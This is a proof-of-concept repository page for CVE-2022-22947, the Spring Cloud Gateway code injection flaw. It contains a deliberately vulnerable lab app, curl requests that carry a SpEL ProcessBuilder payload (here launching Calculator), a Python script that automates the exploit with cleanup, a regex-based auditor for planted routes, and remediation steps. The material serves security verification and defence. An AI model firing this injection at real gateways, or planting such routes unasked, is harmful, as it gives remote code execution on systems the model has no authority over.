
CVE-2022-22947 PoC — VMware Spring Cloud Gateway Code Injection Vulnerability

Source

Associated Vulnerability
Title: VMware Spring Cloud Gateway Code Injection Vulnerability (CVE-2022-22947)
Description: In Spring Cloud Gateway versions prior to 3.1.1+ and 3.0.7+, applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.

Description
An AI-generated vulnerability verification application
Readme
# CVE-2022-22947 Spring Cloud Gateway Vulnerability Verification Application

This is a Spring Cloud Gateway application built specifically to demonstrate and verify CVE-2022-22947. It pins a vulnerable Spring Cloud Gateway version and exposes the unsecured Gateway Actuator endpoint, through which arbitrary code can be executed.

## Vulnerability Overview

CVE-2022-22947 is a remote code execution vulnerability in Spring Cloud Gateway. When the Gateway Actuator endpoint is exposed and unauthenticated, an attacker can add a route through it whose filter arguments contain a malicious SpEL expression; the expression is evaluated by the gateway and executes arbitrary code.

## Requirements

- Java 11+
- Maven 3.6+
- macOS (only for the Calculator demonstration; the payload below runs `open -a Calculator`)

## Starting the Application

```bash
mvn spring-boot:run
```

The application starts on `http://localhost:8080`.

## Verification Steps

### Step 1: Add the malicious route

Send a POST request to the `/actuator/gateway/routes/test` endpoint to add a route whose filter argument contains a malicious SpEL expression:

```bash
curl -X POST http://localhost:8080/actuator/gateway/routes/test \
  -H "Content-Type: application/json" \
  -d '{
    "id": "test",
    "filters": [
      {
        "name": "AddResponseHeader",
        "args": {
          "name": "Result",
          "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
        }
      }
    ],
    "uri": "http://example.com",
    "predicates": [
      {
        "name": "Path",
        "args": {
          "_genkey_0": "/test"
        }
      }
    ]
  }'
```

### Step 2: Refresh the routes

Send a POST request to the `/actuator/gateway/refresh` endpoint so the gateway loads the new route definition:

```bash
curl -X POST http://localhost:8080/actuator/gateway/refresh
```

### Step 3: Trigger the malicious route

Send a request that matches the new route's `Path` predicate:

```bash
curl http://localhost:8080/test
```

### Expected Result

On successful exploitation the macOS Calculator application launches. Note that the SpEL expression is evaluated when the route definition is materialised during the refresh, so the Calculator will typically appear at Step 2; Step 3 confirms the route is live and returns the evaluated value in the `Result` response header of the proxied response.
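The three requests above, wrapped in one script, as an added example that is not part of the original PoC repository. It sends the same route definition, refresh and trigger the README shows, reads back the `Result` header, and then removes the route and refreshes again so an authorised test does not leave a backdoored route behind. `BASE_URL`, the route id, the path and the `send` transport hook are assumptions; the SpEL payload is the README's own macOS Calculator expression.

```python
"""Drive the add -> refresh -> trigger -> cleanup sequence for CVE-2022-22947."""
import json
import urllib.error
import urllib.request

BASE_URL = "http://localhost:8080"   # assumed lab target from the README
ROUTE_ID = "test"                    # assumed route id, as in the README
ROUTE_PATH = "/test"                 # assumed Path predicate, as in the README
# README payload: launches Calculator on macOS when the expression is evaluated.
SPEL_PAYLOAD = '#{new java.lang.ProcessBuilder("open", "-a", "Calculator").start()}'


def build_route(route_id, path, spel_value):
    """Route definition accepted by POST /actuator/gateway/routes/{id}.

    The vulnerable gateway evaluates filter argument values as SpEL
    templates, so anything wrapped in #{...} inside 'value' runs as Java.
    """
    return {
        "id": route_id,
        "filters": [
            {"name": "AddResponseHeader",
             "args": {"name": "Result", "value": spel_value}}
        ],
        "uri": "http://example.com",
        "predicates": [
            {"name": "Path", "args": {"_genkey_0": path}}
        ],
    }


def http_send(method, url, body=None):
    """Minimal HTTP transport: returns (status, header dict, body text)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method)
    if data is not None:
        req.add_header("Content-Type", "application/json")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, dict(resp.headers), resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, dict(e.headers), e.read().decode(errors="replace")


def exploit(base_url, spel_value, route_id=ROUTE_ID, path=ROUTE_PATH, send=http_send):
    """Run add -> refresh -> trigger -> delete -> refresh.

    `send` is injectable so the sequence can be exercised without a network.
    Returns a list of (step label, HTTP status, Result header or None).
    """
    routes_url = f"{base_url}/actuator/gateway/routes/{route_id}"
    refresh_url = f"{base_url}/actuator/gateway/refresh"
    steps = []

    status, _, _ = send("POST", routes_url, build_route(route_id, path, spel_value))
    steps.append(("add_route", status, None))
    # The SpEL is evaluated when the route is materialised on refresh, so a
    # side-effecting payload (the Calculator) usually fires at this step.
    status, _, _ = send("POST", refresh_url)
    steps.append(("refresh", status, None))
    status, headers, _ = send("GET", f"{base_url}{path}")
    # Header names are case-insensitive; normalise before the lookup.
    result = {k.lower(): v for k, v in headers.items()}.get("result")
    steps.append(("trigger", status, result))
    # Cleanup: delete the planted route and refresh so it stops being served.
    status, _, _ = send("DELETE", routes_url)
    steps.append(("delete_route", status, None))
    status, _, _ = send("POST", refresh_url)
    steps.append(("refresh_after_delete", status, None))
    return steps


if __name__ == "__main__":
    for label, status, result in exploit(BASE_URL, SPEL_PAYLOAD):
        print(f"{label:22s} HTTP {status}  {result or ''}")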

## Key Request Details

### 1. Request that adds the malicious route

**Endpoint**: `POST /actuator/gateway/routes/test`

**Request headers**:
```
Content-Type: application/json
```

**Request body**:
```json
{
  "id": "test",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
      }
    }
  ],
  "uri": "http://example.com",
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/test"
      }
    }
  ]
}
```

### 2. Request that refreshes the routes

**Endpoint**: `POST /actuator/gateway/refresh`

### 3. Request that triggers the vulnerability

**Endpoint**: `GET /test`

## Vulnerability Analysis

The vulnerability lets an attacker add routes dynamically through the Gateway Actuator endpoint and place SpEL expressions in the route's filter arguments. The root cause is that Spring Cloud Gateway treats filter argument values in a route definition as SpEL templates and evaluates them in an unrestricted evaluation context when the route definition is turned into a live route, so a `#{...}` expression in the `value` argument can instantiate arbitrary classes such as `java.lang.ProcessBuilder` and run commands with the gateway's privileges. The Actuator endpoint is only the delivery channel: without authentication on `/actuator/gateway/**`, anyone who can reach the gateway can plant such a route.
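For incident response, the same property can be turned around: a route that has already been planted shows up in the gateway's own route dump. The following auditor is an added example, not code from the PoC repository. It walks every string in a route list such as the JSON returned by `GET /actuator/gateway/routedefinitions` (structured `args`) or `GET /actuator/gateway/routes` (filters rendered as strings) and flags SpEL template delimiters and other markers that never belong in a legitimate route argument. The sample route list is constructed; the second route in it reproduces the route the README's PoC adds.

```python
"""Flag SpEL and Java type references in a Spring Cloud Gateway route dump."""
import json
import re

# Markers that should never appear inside a legitimate route argument.
SUSPICIOUS = re.compile(r"#\{|T\(|java\.lang\.|getRuntime\(|ProcessBuilder")

# Constructed sample in the shape of /actuator/gateway/routedefinitions output.
SAMPLE_ROUTE_DEFINITIONS = json.loads(r'''
[
  {"id": "orders",
   "predicates": [{"name": "Path", "args": {"_genkey_0": "/orders/**"}}],
   "filters": [{"name": "StripPrefix", "args": {"_genkey_0": "1"}}],
   "uri": "lb://orders-service", "order": 0},
  {"id": "test",
   "predicates": [{"name": "Path", "args": {"_genkey_0": "/test"}}],
   "filters": [{"name": "AddResponseHeader",
                "args": {"name": "Result",
                         "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"}}],
   "uri": "http://example.com", "order": 0}
]
''')


def _walk(node, path=""):
    """Yield (json_path, string) for every string leaf in a nested structure."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node


def find_spel_routes(routes):
    """Return [(route_id, json_path, value)] for every suspicious string.

    Accepts both the 'id' key used by route definitions and the 'route_id'
    key used by the rendered /actuator/gateway/routes output.
    """
    hits = []
    for index, route in enumerate(routes):
        route_id = route.get("id") or route.get("route_id") or f"<unnamed-{index}>"
        for json_path, text in _walk(route):
            if SUSPICIOUS.search(text):
                hits.append((route_id, json_path, text))
    return hits


if __name__ == "__main__":
    for route_id, json_path, text in find_spel_routes(SAMPLE_ROUTE_DEFINITIONS):
        print(f"route {route_id!r}: {json_path} -> {text}")
```

Feed it the live dump (`curl http://gateway:8080/actuator/gateway/routedefinitions | python3 audit.py` after replacing the constant with `json.load(sys.stdin)`), and treat any hit as an indicator that the Actuator endpoint has been reached by an attacker, not merely as a misconfiguration.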

## Remediation

1. Upgrade to Spring Cloud Gateway 3.1.1+ or 3.0.7+.
2. Disable the Gateway Actuator endpoint, or do not expose it over HTTP (for example, leave `gateway` out of `management.endpoints.web.exposure.include`), or restrict network access to the management port.
3. If the endpoint must stay exposed, protect `/actuator/**` with Spring Security so that only authenticated, authorised principals can add or refresh routes.

## Version Information

- Spring Boot: 2.6.2
- Spring Cloud: 2021.0.0
- Spring Cloud Gateway: 3.1.0 (vulnerable version)

## Notes

⚠️ **Security warning**: This application is intended for educational and security research purposes only. Do not use or deploy it in a production environment.

⚠️ **Legal notice**: Make sure you have proper authorisation before using this application for vulnerability testing. Unauthorised testing may violate applicable laws and regulations.
File Snapshot

```
[4.0K] /data/pocs/644d7350cfd8d0a42338748c0c7a0c9eed007f63
├── [2.0K] pom.xml
├── [3.2K] README.md
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] com
        │       └── [4.0K] example
        │           └── [4.0K] vulnerablegateway
        │               └── [ 354] VulnerableGatewayApplication.java
        └── [4.0K] resources
            └── [ 333] application.yml

7 directories, 4 files
```